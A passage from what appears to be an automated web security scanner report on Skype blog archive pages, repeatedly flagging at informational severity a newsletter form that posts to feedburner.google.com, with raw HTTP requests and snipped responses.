<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.12. http://blogs.skype.com/en/2005/10/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/10/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2005/10/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:54 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 301665
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.13. http://blogs.skype.com/en/2005/11/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/11/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2005/11/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:52 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 342969
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.14. http://blogs.skype.com/en/2005/12/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/12/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2005/12/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:51 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 504735
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.15. http://blogs.skype.com/en/2006/01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/01/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2006/01/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:48 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 341005
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.16. http://blogs.skype.com/en/2006/02/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/02/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2006/02/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:47 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 345891
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.17. http://blogs.skype.com/en/2006/03/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/03/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2006/03/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:45 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 403234
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.18. http://blogs.skype.com/en/2006/04/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/04/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2006/04/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:43 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 250170
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.19. http://blogs.skype.com/en/2006/05/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/05/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2006/05/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:41 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 790051
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.20. http://blogs.skype.com/en/2006/06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/06/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2006/06/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:39 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 451171
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.21. http://blogs.skype.com/en/2006/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/07/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2006/07/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:37 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 338410
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.22. http://blogs.skype.com/en/2006/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/08/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2006/08/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:35 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 371498
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.23. http://blogs.skype.com/en/2006/09/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/09/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2006/09/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:33 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 248309
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.24. http://blogs.skype.com/en/2006/10/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/10/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2006/10/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:32 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 198595
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.25. http://blogs.skype.com/en/2006/11/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/11/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2006/11/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:30 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 351504
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.26. http://blogs.skype.com/en/2006/12/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/12/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2006/12/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:28 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 288676
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.27. http://blogs.skype.com/en/2007/01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/01/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2007/01/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:27 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 242360
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.28. http://blogs.skype.com/en/2007/02/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/02/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2007/02/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:25 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 165110
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.29. http://blogs.skype.com/en/2007/03/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/03/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2007/03/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:24 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 228535
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.30. http://blogs.skype.com/en/2007/04/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/04/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2007/04/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:23 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 107509
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.31. http://blogs.skype.com/en/2007/05/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/05/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2007/05/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:22 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 262371
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.32. http://blogs.skype.com/en/2007/06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/06/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2007/06/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:20 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 204711
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.33. http://blogs.skype.com/en/2007/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/07/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2007/07/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:19 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 170679
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.34. http://blogs.skype.com/en/2007/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/08/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2007/08/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:17 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 617800
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.35. http://blogs.skype.com/en/2007/09/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/09/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2007/09/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:15 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 111695
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.36. http://blogs.skype.com/en/2007/10/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/10/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2007/10/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:14 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 134252
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.37. http://blogs.skype.com/en/2007/11/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/11/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2007/11/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
